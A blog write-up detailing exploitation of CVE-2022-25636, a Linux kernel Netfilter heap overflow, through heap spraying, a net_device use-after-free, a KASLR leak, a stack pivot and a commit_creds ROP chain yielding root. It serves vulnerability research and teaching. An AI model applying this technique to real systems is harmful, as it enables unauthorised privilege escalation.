CVE-2022-25636
In this blog post I cover the exploitation details for CVE-2022-25636, a bug in the Linux kernel's Netfilter component discovered by @kallsyms.
His blog post already does a great job of explaining how he discovered the vulnerability, so here I focus only on the exploitation phase.
Introduction
The bug is a heap out-of-bounds write in the function nft_fwd_dup_netdev_offload(), located in nf_dup_netdev.c.
The bug was introduced in version 5.4.
The bug
Let’s take a look at the vulnerable function:
int nft_fwd_dup_netdev_offload(struct nft_offload_ctx *ctx,
                               struct nft_flow_rule *flow,
                               enum flow_action_id id, int oif)
{
    struct flow_action_entry *entry;
    struct net_device *dev;

    /* nft_flow_rule_destroy() releases the reference on this device. */
    dev = dev_get_by_index(ctx->net, oif);
    if (!dev)
        return -EOPNOTSUPP;

    entry = &flow->rule->action.entries[ctx->num_actions++];
    entry->id = id;
    entry->dev = dev;

    return 0;
}
Each time nft_fwd_dup_netdev_offload() is called, ctx->num_actions is incremented regardless of the size allocated for rule->action.entries, and the OOB write is triggered:
entry = &flow->rule->action.entries[ctx->num_actions++];
entry->id = id;
entry->dev = dev;
id is of type enum flow_action_id, and in our case id = FLOW_ACTION_MIRRED = 5.
dev is a pointer to the targeted net_device struct.
net_device is the struct used to describe network devices (such as “lo”, “eth0”, etc.). It resides in the kmalloc-4096 slab, and we will describe it later.
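To make the missing check concrete, here is a minimal userland model of the same pattern with a bounds check added. The struct and function names (model_entry, model_rule, model_add_entry) are hypothetical stand-ins I made up for illustration, and this is not the upstream patch; it only shows the kind of guard the vulnerable function lacks.

```c
#include <stddef.h>
#include <errno.h>

/* Hypothetical, simplified stand-ins for the kernel structures. */
struct model_entry {
    int   id;
    void *dev;
};

struct model_rule {
    unsigned int       num_entries;  /* capacity chosen at allocation time */
    struct model_entry entries[4];   /* fixed size only to keep the model simple */
};

/* Same shape as the vulnerable function, plus the bounds check it lacked. */
int model_add_entry(struct model_rule *rule, unsigned int *num_actions,
                    int id, void *dev)
{
    if (*num_actions >= rule->num_entries)
        return -EOPNOTSUPP;          /* refuse instead of writing past the array */

    struct model_entry *entry = &rule->entries[(*num_actions)++];
    entry->id = id;
    entry->dev = dev;
    return 0;
}
```

With num_entries = 1, the first call succeeds and the second one is rejected, whereas the real function would happily write entries[1].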
Exploitation
The vulnerability doesn’t give us a lot of control over the heap, but luckily it’s enough to get a root shell :).
We will be targeting Ubuntu 21.10 running kernel version 5.13.0-30.
Let’s go step by step through the possible ideas for exploitation.
- Leaking the heap
- Leaking function pointers
- RIP control
1. Leaking the heap
As we said before, one of the values written out of bounds is a pointer to a net_device struct, which resides on the heap.
If we manage to allocate, right after the rule struct, a buffer whose content is later returned to userland, we can make the dev pointer land in that buffer and leak it.
One example of such a buffer is the msg_msg struct.
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | |
0x30 | | |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | |
---------------------------------------------------
0x00 | list head *next | list head *prev | <- msg_msg
0x10 | m_type | m_ts |
0x20 | *next | *security |
0x30 | | | <--|
0x40 | | | |
0x50 | | | | user data
0x60 | | | |
0x70 | | | <--|
---------------------------------------------------
By changing the number of accounted “dup” expressions we can choose the size of the rule struct, i.e. the destination kmalloc slab.
This is the rule struct:
/* offset | size */ struct flow_rule {
/* 0 | 24 */ struct flow_match {
/* 0 | 8 */ struct flow_dissector *dissector;
/* 8 | 8 */ void *mask;
/* 16 | 8 */ void *key;
} match;
/* 24 | 8 */ struct flow_action {
/* 24 | 4 */ unsigned int num_entries;
/* XXX 4-byte hole */
/* 32 | 0 */ struct flow_action_entry entries[];
} action;
}
For example, if we set only one “dup” expression, the rule buffer will be of size:
sizeof(struct flow_rule) + 1 * sizeof(struct flow_action_entry) =
32 + 1 * 80 = 112 -> kmalloc-128
(entries[] starts at offset 32, not 28, because of the 4-byte hole after num_entries.)
So we can choose the kmalloc slab by increasing the number of accounted dups:
32 + 1*80 = 112 -> kmalloc-128
32 + 2*80 = 192 -> kmalloc-192
32 + 3*80 = 272 -> kmalloc-512
...
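The size-to-slab mapping can be sketched as a small helper. It uses the offset of entries[] from the struct dump (32) and the 80-byte entry size from the calculation; the list of cache sizes is my assumption of the usual x86-64 general-purpose kmalloc caches, and the function names are made up for this example.

```c
#include <stddef.h>

/* Values taken from the struct layout above. */
#define FLOW_RULE_HDR   32  /* offset of entries[] in struct flow_rule */
#define FLOW_ENTRY_SIZE 80  /* sizeof(struct flow_action_entry) */

/* Bytes requested for a rule with n accounted actions. */
size_t rule_alloc_size(unsigned int n)
{
    return FLOW_RULE_HDR + (size_t)n * FLOW_ENTRY_SIZE;
}

/* Smallest general-purpose kmalloc cache that fits `size` (0 if none listed).
 * The cache list is an assumption about a typical x86-64 configuration. */
size_t kmalloc_cache_for(size_t size)
{
    static const size_t caches[] = { 8, 16, 32, 64, 96, 128, 192, 256,
                                     512, 1024, 2048, 4096, 8192 };
    for (size_t i = 0; i < sizeof(caches) / sizeof(caches[0]); i++)
        if (size <= caches[i])
            return caches[i];
    return 0;
}
```

Calling kmalloc_cache_for(rule_alloc_size(n)) for n = 1, 2, 3 gives 128, 192 and 512, matching the slabs listed above.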
msg_msg alternatives
The struct msg_msg is usually the way to go when spraying the heap. However, the struct has a 0x30-byte header before the actual buffer:
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;                /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};
// sizeof(struct msg_msg) = 0x30
Our leak relies on a heap OOB write, and we want to corrupt as few structures on the heap as possible.
Suppose that we set 1 accounted dup (so we are in kmalloc-128).
If our heap spray was successful (a msg_msg is directly after the rule struct), then the msg_msg header isn’t really a problem.
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | id (acc dup)| |
0x30 | | *dev (acc dup) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | id (oob 1) | |
---------------------------------------------------
0x00 | | *dev (oob 1) | <- msg_msg
0x10 | | |
0x20 | | |
0x30 | | | <--|
0x40 | | id (oob 2) | | |
0x50 | | *dev (oob 2) | | user data
0x60 | | | |
0x70 | | | <--|
---------------------------------------------------
To make the net_device pointer land in our buffer we would need to trigger 2 OOB dups.
The only corrupted field would be msg_msg.m_list.prev, but this is not a problem.
The problem is that if our spray didn’t succeed, and the chunk after the rule is not our msg_msg, then we could be overwriting important data and make the kernel panic.
My solution to make this leak as safe as possible was to use msg_msgseg instead of msg_msg.
Brief Linux IPC recap
When we call msgsnd() with a size > DATALEN_MSG (4096 - sizeof(struct msg_msg) bytes), our message is split on the heap: msg_msg.next points to a msg_msgseg struct that holds the rest of the data.
struct msg_msgseg {
    struct msg_msgseg *next;
    /* the next part of the message follows immediately */
};
// sizeof(struct msg_msgseg) = 0x8
Look at that! We only have an 8-byte header now.
So if we call msgsnd() with size = (4096 - 0x30) + (128 - 0x8), we get a msg_msg in kmalloc-4096 and a msg_msgseg in kmalloc-128.
Perfect! We can use this strategy to spray kmalloc-128 using msg_msgseg.
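As a rough sketch of that size calculation, the helper below computes the payload length and sends one such message. The helper names are hypothetical, the queue id is assumed to come from an earlier msgget() call, and the sketch assumes the default msgmax limit (8192 bytes) so that a message of this size is accepted.

```c
#define _DEFAULT_SOURCE
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define PAGE_SZ        4096
#define MSG_MSG_HDR    0x30  /* sizeof(struct msg_msg) */
#define MSG_MSGSEG_HDR 0x8   /* sizeof(struct msg_msgseg) */

/* Payload length that fills one msg_msg page and leaves a remainder
 * whose msg_msgseg occupies exactly `seg_cache` bytes. */
size_t msgseg_payload_len(size_t seg_cache)
{
    return (PAGE_SZ - MSG_MSG_HDR) + (seg_cache - MSG_MSGSEG_HDR);
}

/* Send one such message on queue `qid`; returns msgsnd()'s result. */
int spray_one_msgseg(int qid, long mtype, size_t seg_cache)
{
    size_t len = msgseg_payload_len(seg_cache);
    struct { long mtype; char mtext[]; } *m = calloc(1, sizeof(long) + len);

    if (!m)
        return -1;
    m->mtype = mtype;            /* must be > 0 for msgsnd() */
    memset(m->mtext, 'A', len);
    int ret = msgsnd(qid, m, len, 0);
    free(m);
    return ret;
}
```

For kmalloc-128 the payload length is 4048 + 120 = 4168 bytes. A spray would call spray_one_msgseg() in a loop on a queue created with msgget(IPC_PRIVATE, IPC_CREAT | 0600).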
Back to our example. Now we only need 1 oob dup instead of 2:
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | id (acc dup)| |
0x30 | | *dev (acc dup) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | id (oob 1) | |
---------------------------------------------------
0x00 | *next | *dev (oob 1) | <- msg_msgseg
0x10 | | |
0x20 | | |
0x30 | | |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | |
---------------------------------------------------
This way we only need 1 OOB write, so if our heap spray failed we corrupted at most 8 bytes, which lets us retry the spray with a lower probability of crashing the kernel.
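The diagrams above can be reproduced with a bit of arithmetic. The sketch below assumes that slab objects are contiguous and that dev sits 24 bytes into a flow_action_entry (this is what the diagrams imply; it is not stated explicitly in the text). The names are made up for the example.

```c
#include <stddef.h>

#define ENTRIES_OFF 32  /* offset of entries[] in struct flow_rule */
#define ENTRY_SIZE  80  /* sizeof(struct flow_action_entry) */
#define DEV_OFF     24  /* offset of dev inside an entry (assumed from the diagrams) */

struct landing {
    size_t chunk;   /* 0 = the rule's own slab object, 1 = the next object, ... */
    size_t offset;  /* byte offset inside that object */
};

/* Where the dev pointer of entries[idx] lands when the rule sits in a
 * cache of `cache` bytes and the neighbouring objects are contiguous. */
struct landing dev_landing(size_t idx, size_t cache)
{
    size_t abs = ENTRIES_OFF + idx * ENTRY_SIZE + DEV_OFF;
    struct landing l = { abs / cache, abs % cache };
    return l;
}
```

With one accounted dup in kmalloc-128, dev_landing(1, 128) is offset 0x08 of the next object: right after msg_msgseg.next, or on m_list.prev if the neighbour is a msg_msg.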
2. Leaking function pointers
Now that we have a stable heap leak, we need to leak the base virtual address of the kernel .text.
The struct net_device contains many pointers to _ops structures (which are just structs containing function pointers), so if we find a way to leak its content we can defeat KASLR.
2.1 Overwriting net_device struct
A good starting point to leak KASLR is to free the net_device struct and cause a UAF.
One way to free the net_device struct is to overwrite the msg_msg.security pointer with the net_device pointer during our OOB writes. Then, when the msg_msg is freed, msg_msg.security is freed as well.
// msgrcv() -> free_msg() -> security_msg_msg_free()
void security_msg_msg_free(struct msg_msg *msg) {
    ...
    kfree(msg->security);
    ...
}
Here is where the exploit starts losing stability.
Let’s try to overwrite the security pointer using the kmalloc-128 slab.
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | id (acc dup)| |
0x30 | | *dev (acc dup) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | id (oob 1) | |
---------------------------------------------------
0x00 | | *dev (oob 1) | <- msg_msg
0x10 | | |
0x20 | | *security | <- msg_msg.security
0x30 | | | <--|
0x40 | | id (oob 2) | | |
0x50 | | *dev (oob 2) | | user data
0x60 | | | |
0x70 | | | <--|
---------------------------------------------------
Oops, because of alignment issues we can’t just overwrite the security pointer.
However, if we use 1 more OOB write:
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | id (acc dup)| |
0x30 | | *dev (acc dup) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | id (oob 1) | |
---------------------------------------------------
0x00 | | *dev (oob 1) | <- msg_msg 1
0x10 | | |
0x20 | | | <- msg_msg.security
0x30 | | |
0x40 | | id (oob 2) | |
0x50 | | *dev (oob 2) |
0x60 | | |
0x70 | | |
---------------------------------------------------
0x00 | | | <- msg_msg 2
0x10 | | id (oob 3) | |
0x20 | | *dev (oob 3) | <- msg_msg.security
0x30 | | |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | |
---------------------------------------------------
Yes! We overwrote the msg_msg.security pointer!
The problem here is that if our heap spray doesn’t succeed we could corrupt two different heap allocations.
The biggest problem arises when there is a free chunk directly after our rule struct. In that case the id field of the second OOB write would overwrite the freelist pointer, which would make the kernel panic very soon.
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | id (acc dup)| |
0x30 | | *dev (acc dup) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | id (oob 1) | |
---------------------------------------------------
0x00 | | *dev (oob 1) | <- free chunk
0x10 | | |
0x20 | | |
0x30 | | |
0x40 | | id (oob 2) | <----------------------- freelist pointer
0x50 | | *dev (oob 2) |
0x60 | | |
0x70 | | |
---------------------------------------------------
0x00 | | | <- msg_msg 1
0x10 | | id (oob 3) | |
0x20 | | *dev (oob 3) | <- msg_msg.security
0x30 | | |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | |
---------------------------------------------------
The idea is to switch the kmalloc slab used by the rule struct.
Let’s increase the number of accounted dups from 1 to 2 (the rule struct is now in kmalloc-192) and the number of unaccounted dups to 6.
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | |id (acc dup 1)| |
0x30 | | *dev (acc dup 1) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | |id (acc dup 2)| |
0x80 | | *dev (acc dup 2) |
0x90 | | |
0xa0 | | |
0xb0 | | |
---------------------------------------------------
0x00 | | id (oob 1) | | <- msg_msg 1
0x10 | | *dev (oob 1) |
0x20 | | |
0x30 | | |
0x40 | | |
0x50 | | id (oob 2) | |
0x60 | | *dev (oob 2) |
0x70 | | |
0x80 | | |
0x90 | | |
0xa0 | | id (oob 3) | |
0xb0 | | *dev (oob 3) |
---------------------------------------------------
0x00 | | | <- msg_msg 2
0x10 | | |
0x20 | | |
0x30 | | id (oob 4) | |
0x40 | | *dev (oob 4) |
0x50 | | |
0x60 | | |
0x70 | | |
0x80 | | id (oob 5) | |
0x90 | | *dev (oob 5) |
0xa0 | | |
0xb0 | | |
---------------------------------------------------
0x00 | | | <- msg_msg 3
0x10 | | id (oob 6) | |
0x20 | | *dev (oob 6) | <- msg_msg.security
0x30 | | |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | |
0x80 | | |
0x90 | | |
0xa0 | | |
0xb0 | | |
---------------------------------------------------
Here, if our heap spray doesn’t succeed, we could theoretically overwrite 3 different heap structures and maybe cause a kernel panic.
However, there is no danger of overwriting the freelist pointer.
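The comparison between the two slabs can be checked mechanically. The sketch below walks the OOB entries until a dev pointer lands on msg_msg.security (offset 0x28) and reports whether any write on the way overlaps the freelist pointer slot. It assumes contiguous objects, dev at offset 24 of an entry, and a freelist pointer stored at the middle of the object (cache / 2), which is what the kmalloc-128 diagram above shows; the function names are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>

#define ENTRIES_OFF  32    /* offset of entries[] in struct flow_rule */
#define ENTRY_SIZE   80    /* sizeof(struct flow_action_entry) */
#define DEV_OFF      24    /* offset of dev inside an entry (assumed) */
#define SECURITY_OFF 0x28  /* offset of msg_msg.security */

/* True if [a, a+alen) and [b, b+blen) overlap. */
static bool overlaps(size_t a, size_t alen, size_t b, size_t blen)
{
    return a < b + blen && b < a + alen;
}

/* Number of OOB entries needed until a dev pointer lands exactly on
 * msg_msg.security of a following object, or 0 if none does within
 * `max_oob`. *hits_freelist is set if any write up to that point touches
 * the assumed freelist slot (cache / 2) of an object after the rule. */
size_t oob_needed(size_t accounted, size_t cache, size_t max_oob,
                  bool *hits_freelist)
{
    *hits_freelist = false;
    for (size_t k = 1; k <= max_oob; k++) {
        size_t id_abs  = ENTRIES_OFF + (accounted + k - 1) * ENTRY_SIZE;
        size_t dev_abs = id_abs + DEV_OFF;

        /* id is 4 bytes wide, dev is 8 bytes wide */
        if (id_abs / cache > 0 && overlaps(id_abs % cache, 4, cache / 2, 8))
            *hits_freelist = true;
        if (dev_abs / cache > 0 && overlaps(dev_abs % cache, 8, cache / 2, 8))
            *hits_freelist = true;
        if (dev_abs / cache > 0 && dev_abs % cache == SECURITY_OFF)
            return k;
    }
    return 0;
}
```

Under these assumptions, oob_needed(1, 128, ...) returns 3 with the freelist flag set, while oob_needed(2, 192, ...) returns 6 with the flag clear, which is why kmalloc-192 is the safer choice here.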
One bonus point is that when we overwrite the security field of the msg_msg we also overwrite the lower 4 bytes of msg_msg.m_type with id.
If during msgsnd() we set msg_msg.m_type to 0x4141414141414141, then when freeing the msg_msg structs we can check whether one of the m_type values is 0x4141414100000005.
If that happens, we know we successfully overwrote the security field.
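The expected value follows directly from the 4-byte id being written over the low half of the 8-byte m_type on a little-endian machine. A minimal sketch of the check, with made-up helper names:

```c
#include <stdbool.h>
#include <stdint.h>

#define FLOW_ACTION_MIRRED 5u

/* m_type value after the 4-byte id overwrites its low half
 * (little-endian, as on x86-64). */
uint64_t clobbered_mtype(uint64_t marker)
{
    return (marker & 0xffffffff00000000ULL) | FLOW_ACTION_MIRRED;
}

/* True if a received message type shows the expected partial overwrite. */
bool mtype_was_clobbered(uint64_t received, uint64_t marker)
{
    return received != marker && received == clobbered_mtype(marker);
}
```

The `received` argument would be the mtype field that msgrcv() copies back to userland.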
Reallocating the net_device struct
Once we have freed the net_device struct we can spray the kmalloc-4096 slab to overwrite it.
Most of the operations on the net_device struct access data stored at the top of the struct (i.e. in the first 0x30 bytes of the allocation), such as net_device.name, which is the first field of the struct.
For that reason we need to control the full reallocated chunk, and thus we can’t use a msg_msg spray.
We need another spraying technique: the setxattr spray.
Usually the setxattr spray is done together with userfaultfd; however, the unprivileged_userfaultfd sysctl knob doesn’t allow unprivileged users to use it.
As an alternative I used the FUSE technique, which lets us stall the kernel inside a copy_to/from_user exactly like userfaultfd does. To learn more about the FUSE technique I recommend reading this writeup for CVE-2022-0185.
kmalloc-4096 spray
And what if our kmalloc-4096 spray doesn’t overwrite the net_device struct?
The net_device struct has a field int ifindex. This field can be retrieved with the SIOCGIFINDEX ioctl, which takes the name of the net_device, in our case “lo”.
We can issue this ioctl through the if_nametoindex(const char *ifname) function.
For example, if “lo” has ifindex = 1 then if_nametoindex("lo") returns 1.
When we overwrite the net_device struct we can set ifindex to a recognizable value (e.g. 0x41414141), so that during the exploit we can check whether if_nametoindex("lo") returns 0x41414141; in that case we are sure that the net_device was overwritten.
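This check is tiny when written out. The helper name and the marker macro below are my own; only if_nametoindex() is the real libc call.

```c
#include <net/if.h>
#include <stdbool.h>

#define IFINDEX_MARKER 0x41414141u  /* value planted in the fake net_device */

/* True if the interface now reports the planted ifindex. */
bool netdev_was_replaced(const char *ifname)
{
    return if_nametoindex(ifname) == IFINDEX_MARKER;
}
```

On an untouched system netdev_was_replaced("lo") is false, since “lo” reports its real index.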
2.2 Obtaining arbitrary read
The struct net_device has a field unsigned char *dev_addr.
This field normally points to the MAC address of the net_device, and its length is specified by the unsigned char addr_len field.
One way to read from dev_addr is through the SIOCGIFHWADDR ioctl.
Here is an example:
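struct ifreq *ifr = calloc(1, 0x1000);
strcpy(ifr->ifr_name, "lo");
int fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
if (fd < 0) {   /* socket() returns -1 on failure, not 0 */
    perror("socket()");
    exit(1);
}
if (ioctl(fd, SIOCGIFHWADDR, ifr) != 0) {
    perror("ioctl(SIOCGIFHWADDR)");
    exit(1);
}
/* on success, ifr->ifr_hwaddr.sa_data holds the bytes read from dev_addr */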
This is the ioctl handler:
int dev_ioctl(struct net *net, unsigned int cmd, struct ifreq *ifr,
              void __user *data, bool *need_copyout)
{
    ...
    switch (cmd) {
    case SIOCGIFHWADDR:
        dev_load(net, ifr->ifr_name);
        ret = dev_get_mac_address(&ifr->ifr_hwaddr, net, ifr->ifr_name);
        ...
        return ret;
    ...
    }
}
dev_get_mac_address:
int dev_get_mac_address(struct sockaddr *sa, struct net *net, char *dev_name)
{
    ...
    struct net_device *dev;
    ...
    dev = dev_get_by_name_rcu(net, dev_name);
    ...
    if (!dev->addr_len)
        memset(sa->sa_data, 0, size);
    else
        memcpy(sa->sa_data, dev->dev_addr, min_t(size_t, size, dev->addr_len)); // <--- arb read
    ...
}
Perfect! After reallocating our net_device we can set the dev_addr pointer to somewhere in the heap and leak data.
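Since the kernel copies min(size, addr_len) bytes into sa_data, a pointer-sized value can be pulled out of the ioctl result as sketched below. This assumes addr_len in the fake net_device was set to at least 8; the helper name is hypothetical.

```c
#define _DEFAULT_SOURCE
#include <net/if.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>

/* Copy the first 8 bytes returned by SIOCGIFHWADDR into an integer.
 * sa_data is 14 bytes long, so one pointer-sized value fits. */
uint64_t hwaddr_to_u64(const struct ifreq *ifr)
{
    uint64_t v;

    memcpy(&v, ifr->ifr_hwaddr.sa_data, sizeof(v));
    return v;
}
```

It would be called on the ifr buffer right after the ioctl(fd, SIOCGIFHWADDR, ifr) call succeeds.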
But what do we leak? After reallocating the net_device, all of the useful _ops pointers are gone (both because of init_on_alloc and because we overwrote the struct with our data).
An interesting fact is that when unsharing into a network namespace, a new net_device for “lo” is allocated. The idea is the following:
- clone() a child using CLONE_NEWNET and leak its net_device pointer as we did before.
- In the parent process, leak the net_device pointer (the two net_device leaks are different!!).
- Now we can free the parent’s net_device, reallocate it, and overwrite the dev_addr pointer with the address of the child’s net_device (which remains untouched and thus still contains many _ops pointers!).
- Call ioctl(SIOCGIFHWADDR) in the parent process and boom, we leaked KASLR :)
The leak I chose is net_device.netdev_ops, which in our case points to loopback_ops.
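Turning the leaked loopback_ops pointer into a usable KASLR slide is a subtraction. The sketch below assumes you know the unrandomized address of the symbol from the target kernel image (for example from its symbol table); no concrete addresses are given here, and the function names are made up.

```c
#include <stdint.h>

/* Difference between where a symbol is at runtime and where the
 * unrandomized kernel image places it. */
uint64_t kaslr_slide(uint64_t leaked_addr, uint64_t unslid_addr)
{
    return leaked_addr - unslid_addr;
}

/* Runtime address of any other symbol, given its unrandomized address. */
uint64_t rebase(uint64_t unslid_addr, uint64_t slide)
{
    return unslid_addr + slide;
}
```

Every gadget and function address used later can then be computed with rebase().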
3. RIP control
Now we have both a heap and a .text leak :). We are very close.
As we said before, the net_device contains many _ops pointers, so when reallocating the net_device struct we can point one of the _ops pointers somewhere into our heap allocation, set one of its function pointers, and execute arbitrary functions.
Obviously SMEP is enabled, so we can’t just jump back to userland.
The idea is to perform stack pivoting: we control the heap allocation, so we can store our pivoted stack on the kernel heap and thus bypass SMAP.
Luckily the kernel is full of useful gadgets to perform stack pivoting.
Most of the net_device function pointers are invoked with the first parameter set to the net_device pointer, so a gadget that pivots the stack to $rdi is perfect. This is the one I found:
push rdi
add BYTE PTR [rbx+0x41],bl
pop rsp
pop r13
pop rbp
ret
Perfect! Now we can simply put a commit_creds(prepare_kernel_cred(0)) ropchain at the top of the reallocated net_device and get root.
The function pointer I decided to overwrite is dev.ethtool_ops->begin.
To call the ->begin function we can use the SIOCETHTOOL ioctl:
int dev_ioctl(struct net *net, unsigned int cmd, struct ifreq *ifr,
              void __user *data, bool *need_copyout)
{
    ...
    switch (cmd) {
    ...
    case SIOCETHTOOL:
        dev_load(net, ifr->ifr_name);
        ...
        ret = dev_ethtool(net, ifr);
        ...
    ...
    }
}
dev_ethtool:
int dev_ethtool(struct net *net, struct ifreq *ifr)
{
    struct net_device *dev = __dev_get_by_name(net, ifr->ifr_name);
    ...
    if (dev->ethtool_ops->begin) {
        rc = dev->ethtool_ops->begin(dev);
        if (rc < 0)
            return rc;
    }
    ...
}
This is what the reallocated net_device will look like:
---------------------------------------------------
0x000 | dev.name = "lo" | | <- net_device
0x010 | | | <--|
0x020 | | | | Pivoted stack
0x030 | | | |
0x040 | | | |
0x050 | | | <--|
0x060 | | |
0x070 | | |
...
0x420 | dev.ethtool_ops ptr | ethtool_ops.begin | <- stack pivot gadget
...
---------------------------------------------------
The ropchain I used is the following:
// set $rdi = 0
pop rdi; ret;
prepare_kernel_cred();
// set the Zero Flag (dh ^ dh == 0), so that the next jne doesn't jump
xor dh, dh; ret;
pop; pop; pop; ret;
// set $rdi to return value of prepare_kernel_cred()
mov rdi, rax; jne; ret;
commit_creds()
// return to userland
kpti_trampoline_pop_rax_pop_rdi_swapgs_iretq
The pop_pop_pop_ret gadget is there because, in order to call dev.ethtool_ops->begin, we must satisfy a check present in dev_ethtool.
int dev_ethtool(struct net *net, struct ifreq *ifr)
{
    struct net_device *dev = __dev_get_by_name(net, ifr->ifr_name);
    ...
    if (!dev || !netif_device_present(dev)) // <----- this
        return -ENODEV;
    ...
    if (dev->ethtool_ops->begin) {
        rc = dev->ethtool_ops->begin(dev);
        if (rc < 0)
            return rc;
    }
    ...
}
static inline bool netif_device_present(const struct net_device *dev)
{
    return test_bit(__LINK_STATE_PRESENT, &dev->state);
}
net_device.state is a bitset, and the bit __LINK_STATE_PRESENT must be set to 1.
Unluckily the unsigned long state field is at the top of the net_device struct, in the middle of our pivoted stack.
We can just set net_device.state = 0xffffffffffffffff and use an extra pop that loads it into an unused register, then continue the ropchain.
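To see why an all-ones state passes the check, here is a userland model of the test. The bit index 1 for __LINK_STATE_PRESENT is my reading of the kernel's enum netdev_state_t and is not stated in the text above, so treat it as an assumption; the function name is made up.

```c
#include <stdbool.h>

/* Bit index of __LINK_STATE_PRESENT in enum netdev_state_t
 * (assumed from the kernel headers; not stated in the text above). */
#define LINK_STATE_PRESENT_BIT 1

/* Userland equivalent of test_bit(__LINK_STATE_PRESENT, &dev->state). */
bool model_device_present(unsigned long state)
{
    return (state >> LINK_STATE_PRESENT_BIT) & 1UL;
}
```

Any value with that bit set would pass; all ones is simply the easiest value that does not depend on the exact bit index.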
Wrapping up
- We create a child process with a new network namespace
- In the child process we leak its net_device pointer
- In the parent process we leak its net_device pointer
- Free the parent’s net_device
- Reallocate it and overwrite net_device.dev_addr with the address of the child’s net_device
- Leak KASLR by reading net_device.dev_addr
- Free the parent’s net_device again
- Reallocate it, store a pivoted stack at the top of the heap allocation, and overwrite a function pointer with a stack pivot gadget
- Call the gadget, perform stack pivoting and get root :)
PoC
Exploit code
You can find my exploit on Github: https://github.com/Bonfee/CVE-2022-25636